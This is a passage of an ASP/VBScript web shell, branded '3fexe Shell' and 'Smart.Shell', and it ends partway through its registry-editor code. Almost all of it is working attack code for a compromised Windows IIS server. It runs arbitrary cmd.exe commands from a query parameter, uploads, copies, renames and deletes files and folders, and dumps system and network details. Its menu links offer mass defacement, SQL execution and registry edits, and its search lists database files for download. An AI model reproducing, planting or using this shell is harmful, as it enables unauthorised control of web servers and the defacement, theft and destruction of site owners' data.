Asp Shell & Mass Deface

1. <%@ LANGUAGE = VBScript.Encode%>
2.     <%//**Start Encode
3.     On Error Resume Next
4.      
5.     Dim myFSO,showdisks
6.     Set myFSO = CreateObject ("Scripting.FileSystemObject")
7.     showdisks=FALSE
8.      
9.     Server.ScriptTimeOut  = 7200
10.     Class FileUploader
11.             Public  Files
12.             Private mcolFormElem
13.             Private Sub Class_Initialize()
14.                     Set Files = Server.CreateObject("Scripting.Dictionary")
15.                     Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
16.             End Sub
17.             Private Sub Class_Terminate()
18.                     If IsObject(Files) Then
19.                             Files.RemoveAll()
20.                             Set Files = Nothing
21.                     End If
22.                     If IsObject(mcolFormElem) Then
23.                             mcolFormElem.RemoveAll()
24.                             Set mcolFormElem = Nothing
25.                     End If
26.             End Sub
27.             Public Property Get Form(sIndex)
28.                     Form = ""
29.                     If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
30.             End Property
31.             Public Default Sub Upload()
32.                     Dim biData, sInputName
33.                     Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
34.                     Dim nPosFile, nPosBound
35.                     biData = Request.BinaryRead(Request.TotalBytes)
36.                     nPosBegin = 1
37.                     nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
38.                     If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
39.                     vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
40.                     nDataBoundPos = InstrB(1, biData, vDataBounds)
41.                     Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
42.                             nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
43.                             nPos = InstrB(nPos, biData, CByteString("name="))
44.                             nPosBegin = nPos + 6
45.                             nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
46.                             sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
47.                             nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
48.                             nPosBound = InstrB(nPosEnd, biData, vDataBounds)
49.                             If nPosFile <> 0 And  nPosFile < nPosBound Then
50.                                     Dim oUploadFile, sFileName
51.                                     Set oUploadFile = New UploadedFile
52.                                     nPosBegin = nPosFile + 10
53.                                     nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
54.                                     sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
55.                                     oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
56.                                     nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
57.                                     nPosBegin = nPos + 14
58.                                     nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
59.                                     oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
60.                                     nPosBegin = nPosEnd+4
61.                                     nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
62.                                     oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
63.                                     If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
64.                             Else
65.                                     nPos = InstrB(nPos, biData, CByteString(Chr(13)))
66.                                     nPosBegin = nPos + 4
67.                                     nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
68.                                     If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
69.                             End If
70.                             nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
71.                     Loop
72.             End Sub
73.             Private Function CByteString(sString)
74.                     Dim nIndex
75.                     For nIndex = 1 to Len(sString)
76.                        CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
77.                     Next
78.             End Function
79.             Private Function CWideString(bsString)
80.                     Dim nIndex
81.                     CWideString =""
82.                     For nIndex = 1 to LenB(bsString)
83.                        CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
84.                     Next
85.             End Function
86.     End Class
87.     Class UploadedFile
88.             Public ContentType
89.             Public FileName
90.             Public FileData
91.             Public Property Get FileSize()
92.                     FileSize = LenB(FileData)
93.             End Property
94.             Public Sub SaveToDisk(sPath)
95.                     Dim oFS, oFile
96.                     Dim nIndex
97.                     If sPath = "" Or FileName = "" Then Exit Sub
98.                     If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
99.                     Set oFS = Server.CreateObject("Scripting.FileSystemObject")
100.                     If Not oFS.FolderExists(sPath) Then Exit Sub
101.                     Set oFile = oFS.CreateTextFile(sPath & FileName, True)
102.                     For nIndex = 1 to LenB(FileData)
103.                         oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
104.                     Next
105.                     oFile.Close
106.             End Sub
107.             Public Sub SaveToDatabase(ByRef oField)
108.                     If LenB(FileData) = 0 Then Exit Sub
109.                     If IsObject(oField) Then
110.                             oField.AppendChunk FileData
111.                     End If
112.             End Sub
113.     End Class
114.     startcode = "<html><head><title>.:: 3fexe Shell ::.</title></head><body>"
115.     endocde = "</body></html>"
116.     onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://3fe.us"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
117.     Function HexConv(hexVar)
118.             Dim hxx, hxx_var, multiply          
119.              IF hexVar <> "" THEN
120.                   hexVar = UCASE(hexVar)
121.                   hexVar = StrReverse(hexVar)
122.                   DIM hx()
123.                   REDIM hx(LEN(hexVar))
124.                   hxx = 0
125.                   hxx_var = 0
126.                   FOR hxx = 1 TO LEN(hexVar)
127.                        IF multiply = "" THEN multiply = 1
128.                        hx(hxx) = mid(hexVar,hxx,1)
129.                        hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
130.                        multiply = (multiply * 16)
131.                   NEXT
132.                   hexVar = hxx_var
133.                   HexConv = hexVar
134.              END IF
135.     End Function
136.     cprthtml = "<font face='arial' size='1'>.:: 3FEShell 1.0  ::.</font>"
137.     Function get_hxno(ghx)
138.              If ghx = "A" Then
139.                   ghx = 10
140.              ElseIf ghx = "B" Then
141.                   ghx = 11
142.              ElseIf ghx = "C" Then
143.                   ghx = 12
144.              ElseIf ghx = "D" Then
145.                   ghx = 13
146.              ElseIf ghx = "E" Then
147.                   ghx = 14
148.              ElseIf ghx = "F" Then
149.                   ghx = 15
150.              End If
151.              get_hxno = ghx
152.     End Function
153.      
154.     keydec="<font face='arial' size='1'>.:: Smart.Shell 1.0 &copy; BY <a href='mailto:'>P0Uy@_$3r\/3R</a> - <a href='' target='_blank'></a> ::.</font>"
155.     Function showobj(objpath)
156.             showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
157.     End Function
158.     Function showobjpath(objpath)
159.             showobjpath = Left(objpath,InstrRev(objpath,"\"))
160.     End Function
161.     Function checking(a,b)
162.     '       If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then
163.     '               pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
164.     '               Response.Redirect(pagina)
165.     '       End If
166.     End Function
167.     Sub hdr()
168.             Response.Write startcode
169.             Response.Write keydec
170.             Response.Write "<br>"
171.     End Sub
172.      
173.     sub araBul(path_,ara_)
174.             on error resume next
175.             If Len(path_) > 0 Then
176.                     cur = path_&"\"
177.                     If cur = "\\" Then cur = ""
178.                             parent = ""
179.                             If InStrRev(cur,"\") > 0 Then
180.                             parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
181.                     End If
182.             Else
183.                     cur = ""
184.             End If
185.            
186.             Set f = myFSO.GetFolder(cur)
187.      
188.             Set fc = f.Files
189.             For Each f1 In fc
190.                     if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
191.                             downStr = "<font face=webdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(f1.path,"\","|") &"'>?/a></font>"
192.                             if lcase(ara_)="mdb" then
193.                                     Response.Write downStr&"<font face=wingdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Replace(f1.path,"\","|") & "'>?/a></font> * <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=7&path="&f1.path&"'>"& f1.path &" ["&f1.size&"]"&"</a></b><br>"
194.                             else
195.                                     Response.Write downStr&"<font face=wingdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Replace(f1.path,"\","|") & "'>?/a><a href='"& Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(f1.path,"\","|") &"'>!</a></font> - <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=5&path="&f1.path&"'>"& f1.path &" ["&f1.size&"]</a></b><br>"
196.                             end if
197.                     end if
198.             Next
199.      
200.             Set fs = f.SubFolders
201.             For Each f1 In fs
202.                     araBul f1.path,ara_
203.             Next
204.             Set     f               = Nothing
205.             Set fc          = Nothing
206.             Set fs          = Nothing
207.     end sub
208.      
209.      
210.     Sub showcontent()
211.             showdisks=TRUE
212.             Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
213.             If Trim(Request.QueryString("raiz")) = "root" Then
214.                     Set fs=Server.Createobject("Scripting.FileSystemObject")
215.                     Set drivecollection=fs.drives
216.                     Response.Write "<font face=""arial"" size=""2"">"
217.                     For Each drive IN drivecollection
218.                             str=drive.driveletter & ":"
219.                             Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
220.                             Select Case drive.DriveType
221.                                     Case 0
222.                                             tipodrive = "Unknown"
223.                                             nomedrive = drive.VolumeName
224.                                     Case 1
225.                                             tipodrive = "Removable"
226.                                             If drive.isready Then
227.                                                     nomedrive = drive.VolumeName
228.                                             Else
229.                                                     nomedrive = ""
230.                                             End If
231.                                     Case 2
232.                                             tipodrive = "Fixed"
233.                                             If drive.isready Then
234.                                                     nomedrive = drive.VolumeName
235.                                             Else
236.                                                     nomedrive = ""
237.                                             End If
238.                                     Case 3
239.                                             tipodrive = "Network"
240.                                             If drive.isready Then
241.                                                     nomedrive = drive.ShareName
242.                                             Else
243.                                                     nomedrive = ""
244.                                             End If
245.                                     Case 4
246.                                             tipodrive = "CD-Rom"
247.                                             If drive.isready Then
248.                                                     nomedrive = drive.VolumeName
249.                                             Else
250.                                                     nomedrive = ""
251.                                             End If
252.                                     Case 5
253.                                             tipodrive = "RAM Disk"
254.                                             If drive.isready Then
255.                                                     nomedrive = drive.VolumeName
256.                                             Else
257.                                                     nomedrive = ""
258.                                             End If
259.                             End Select
260.                             response.write "<b>Type:</b> " & tipodrive & "<br>"
261.                             response.write "<b>Name: </b>" & nomedrive & "<br>"
262.                             response.write "<b>File System: </b>"
263.                             If drive.isready Then
264.                                     set sp=fs.getdrive(str)
265.                                     response.write sp.filesystem & "<br>"
266.                             Else
267.                             response.write "-<br>"
268.                             End If
269.                             Response.Write "<b>Disk Space: </b>"
270.                             If drive.isready Then
271.                                     freespace = (drive.AvailableSpace / 1048576)
272.                                     set sp=fs.getdrive(str)
273.                                     response.write(Round(freespace,1) & " MB<br>")
274.                             Else
275.                                     response.write("-<br>")
276.                             End If
277.                             Response.Write "<b>Total Space: </b>"
278.                             If drive.isready Then
279.                                     totalspace = (drive.TotalSize / 1048576)
280.                                     set sp=fs.getdrive(str)
281.                                     response.write(Round(totalspace,1) & " MB<br>")
282.                             Else
283.                                     response.write("-<br>")
284.                             End If
285.                             Response.Write "<br>"
286.                     Next
287.                     Response.Write "</font>"
288.                     Set fs = Nothing
289.                     Set drivecollection = Nothing
290.                     set sp=Nothing
291.             Else
292.                     If Trim(Request.QueryString("raiz")) = "" Then
293.                             caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
294.                             pos = Instr(caminho,"\")
295.                             pos2 = 1
296.                             While pos2 <> 0
297.                                     If Instr(pos + 1,caminho,"\") <> 0 Then
298.                                             pos = Instr(pos + 1,caminho,"\")
299.                                     Else
300.                                             pos2 = 0
301.                                     End If
302.                             Wend
303.                             raiz = Left(caminho,pos)
304.                     Else
305.                             raiz =  trim(Request.QueryString("raiz")) & "\"
306.                     End If
307.                     Set ObjFSO = CreateObject("Scripting.FileSystemObject")
308.                     Set MonRep = ObjFSO.GetFolder(raiz)
309.                     Set ColFolders = MonRep.SubFolders
310.                     Set ColFiles0 = MonRep.Files
311.                     Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
312.                     Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
313.                     Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
314.      
315.                     Response.Write "<font face='arial' size='1'>"
316.                     Response.Write "<a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=450,height=200,scrollbars=YES,resizable')"">PROMPT</a>"
317.                     Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a>"
318.                     Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=200,scrollbars=YES,resizable')"">REGEDIT</a>"
319.                     Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=search&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">SEARCH</a>"
320.                     Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver', 'win1','width=550,height=150,scrollbars=YES,resizable')"">EXECUTE SQL</a>"
321.                     Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=about', 'win1','width=550,height=250,scrollbars=YES,resizable')"">ABOUT</a>"
322.                     Response.Write "</font><br><br>"
323.      
324.      
325.                     Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
326.                     If CInt(Len(raiz) - 1) <> 2 Then
327.                             barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
328.                             backlevel = Left(raiz,barrapos)
329.                             Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
330.                     Else
331.                             Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
332.                     End If
333.                     Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
334.                     for each folderItem in ColFolders
335.                             Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td>"
336.                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=fcopy&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=100,scrollbars=YES,resizable')"">&lt;&lt; Copy/Move</a></font></td>"
337.                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=fdel&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=150,scrollbars=YES,resizable')"">&lt;&lt; Delete</a></font></td></tr>"
338.                     next
339.                     Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
340.                     marcatabela = true
341.                     for each FilesItem0 in ColFiles0
342.                             If marcatabela = true then
343.                                     corfundotabela = " bgcolor=""#EEEEEE"""
344.                             Else
345.                                     corfundotabela = ""
346.                             End If
347.                             Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.?ndir.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a target='opener' href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=filecopy&file=" & Replace(FilesItem0.path,"\","|") & """>o.FileCopy.o</a></font></td></tr>"
348.                             marcatabela = NOT marcatabela
349.                     next
350.                     Response.Write "</table>"
351.             End If
352.     End Sub
353.     Select Case Trim(Request.QueryString("action"))
354.             Case "get"
355.                     checa = checking(cprthtml,keydec)
356.                     Call hdr()
357.                     Response.Write copyright & onlinehelp
358.                     caminho = Replace(Trim(Request.QueryString("path")),"|","\")
359.                     Set ObjFSO = CreateObject("Scripting.FileSystemObject")
360.                     Set MyFile = ObjFSO.GetFile(caminho)
361.                     destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
362.                     MyFile.Copy (destino)
363.                     If Err.Number = 0 Then
364.                             Response.Write "<font face='arial' size='2'><center><br><br>File: <b>" & caminho & "</b><br>Copied to: " & destino
365.                     End If
366.             Case "put"
367.                     checa = checking(cprthtml,keydec)
368.                     Call hdr()
369.                     Response.Write copyright & onlinehelp
370.                     If Trim(Request.QueryString("arquivo")) = "" Then
371.                             caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
372.                             varpath = Trim(Request.QueryString("path"))
373.                             Set ObjFSO = CreateObject("Scripting.FileSystemObject")
374.                             Set MonRep = ObjFSO.GetFolder(caminho)
375.                             Set ColFolders = MonRep.SubFolders
376.                             Set ColFiles0 = MonRep.Files
377.      
378.                             Response.Write "<font face='arial' size='2'><b>Select File: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
379.                             for each FilesItem0 in ColFiles0
380.                                     Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECT ::</a></font></td></tr>"
381.                             next
382.                             Response.Write "</table>"
383.                     Else
384.                             destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
385.                             arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
386.                             Set ObjFSO = CreateObject("Scripting.FileSystemObject")
387.                             Set MyFile = ObjFSO.GetFile(arquivo)
388.                             MyFile.Copy (destino)
389.                             If Err.Number = 0 Then
390.                                     Response.Write "<font face='arial' size='2'><center><br><br>File: <b>" & arquivo & "</b><br>Copied to: <b>" & destino
391.                             End If
392.                     End If
393.             Case "del"
394.                     checa = checking(cprthtml,keydec)
395.                     Call hdr()
396.                     Response.Write copyright & onlinehelp
397.                     caminho = Replace(Trim(Request.QueryString("path")),"|","\")
398.                     Set ObjFSO = CreateObject("Scripting.FileSystemObject")
399.                     Set MyFile = ObjFSO.GetFile(caminho)
400.                     MyFile.Delete
401.                     If Err.Number = 0 Then
402.                             Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
403.                             Response.Write "<font face='arial' size='2'><center><br><br>Folder <b>" & caminho & "</b> Deleted.<br>"
404.                     End If
405.      
406.             Case "fdel"
407.                     checa = checking(cprthtml,keydec)
408.                     Call hdr()
409.                     Response.Write copyright & onlinehelp
410.                     caminho = Replace(Trim(Request.QueryString("path")),"|","\")
411.                     Set ObjFSO = CreateObject("Scripting.FileSystemObject")
412.                     ObjFSO.DeleteFolder caminho
413.                     If Err.Number = 0 Then
414.                             Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
415.                             Response.Write "<font face='arial' size='2'><center><br><br>File <b>" & caminho & "</b> Deleted.<br>"
416.                     End If
417.      
418.             Case "ren"
419.                     checa = checking(cprthtml,keydec)
420.                     Call hdr()
421.                     Response.Write copyright & onlinehelp
422.                     If Trim(Request.QueryString("status")) <> "2" Then
423.                             caminho = Replace(Trim(Request.QueryString("path")),"|","\")
424.                             arquivo = showobj(caminho)
425.                             Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
426.                                                            "<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
427.                                                            "<input type=""hidden"" name=""action"" value=""ren"">" & _
428.                                                            "<input type=""hidden"" name=""status"" value=""2"">" & _
429.                                                            "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
430.                                                            "New Name: <input type=""text"" name=""newname"">" & _
431.                                                            "&nbsp;&nbsp;<input type=""submit"" value=""Submit"">" & _
432.                                                            "</form>"
433.                     Else
434.                             caminho = Replace(Trim(Request.QueryString("path")),"|","\")
435.                             Set ObjFSO = CreateObject("Scripting.FileSystemObject")
436.                             Set MyFile = ObjFSO.GetFile(caminho)
437.                             destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
438.                             MyFile.Move (destino)
439.                             If Err.Number = 0 Then
440.                                     Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
441.                                     Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
442.                             End If
443.                     End If
444.             Case "error"
445.                     Response.Write "<center><font face='arial' size='2' color='red'> <b>C?DIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
446.             Case "cmd"
447.                     checa = checking(cprthtml,keydec)
448.                     Call hdr()
449.                     Response.Write copyright & onlinehelp
450.                     Set oScript = Server.CreateObject("WSCRIPT.SHELL")
451.                     Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
452.                     Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
453.                     szCMD = Request.QueryString(".CMD")
454.                     If (szCMD <> "") Then
455.                             szTempFile = "c:\" & oFileSys.GetTempName( )
456.                             Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
457.                             Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
458.                     End If
459.                     Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
460.                     If (IsObject(oFile)) Then
461.                             On Error Resume Next
462.                             Response.Write "<font face=""arial"">"
463.                             Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
464.                             oFile.Close
465.                             Call oFileSys.DeleteFile(szTempFile, True)
466.                     End If
467.             Case "info"
468.                     checa = checking(cprthtml,keydec)
469.                     Call hdr()
470.                     Response.Write copyright & onlinehelp
471.                     Set WshNetwork = Server.CreateObject("WScript.Network")
472.                     Set WshShell = Server.CreateObject("WScript.Shell")
473.                     Set WshEnv = WshShell.Environment("SYSTEM")
474.                     Response.Write "<br><font face=arial size=2>"
475.                     Response.Write "<b>User Properties:</b><br>"
476.                     Response.Write "<b>UserName: </b>" & WshNetwork.UserName & "<br>"
477.                     Response.Write "<b>Computer Name: </b>" & WshNetwork.ComputerName & "<br>"
478.                     Response.Write "<b>User Domain: </b>" & WshNetwork.UserDomain & "<br>"
479.                     Set Drives = WshNetwork.EnumNetworkDrives
480.                     For i = 0 to Drives.Count - 1
481.                             Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
482.                     Next
483.                     Response.Write "<br><b>Cpu Information:</b><br>"
484.                     Response.Write "<b>Processor Architecture: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
485.                     Response.Write "<b>Number Of Processors: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
486.                     Response.Write "<b>Processor Identifier: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
487.                     Response.Write "<b>Processor Level: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
488.                     Response.Write "<b>Processor Revision: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
489.                     Response.Write "<br><b>Operating System Information:</b><br>"
490.                     Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
491.                     Response.Write "<b>Sistem OS: </b>" & WshEnv("OS") & "<br>"
492.                     Response.Write "<b>Server Software: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
493.                     Response.Write "<b>Cmd Path: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
494.                     Response.Write "<b>Public Paths: </b>" & WshEnv("PATH") & "<br>"
495.                     Response.Write "<b>Executables: </b>" & WshEnv("PATHEXT") & "<br>"
496.                     Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
497.                     Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
498.                     Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
499.                     Response.Write "<b>System32 Path: </b>" & WshShell.CurrentDirectory & "<br>"
500.                     Set Drives = Nothing
501.                     Set WshNetwork = Nothing
502.                     Set WshShell = Nothing
503.                     Set WshEnv = Nothing
504.             Case "reg"
505.                     checa = checking(cprthtml,keydec)
506.                     Call hdr()
507.                     Response.Write copyright & onlinehelp
508.                     Set WshShell = Server.CreateObject("WScript.Shell")
509.                     Response.Write "<font face=""arial"" size=""2""><br><b>Registry Editor:</b><br><br>"
510.                     Select Case Trim(Request.QueryString("regaction"))
511.                             Case "w"
512.                                     If Trim(Request.QueryString("process")) = "yes" Then
513.                                             Select Case Trim(Request.QueryString("type"))
514.                                                     Case "1"
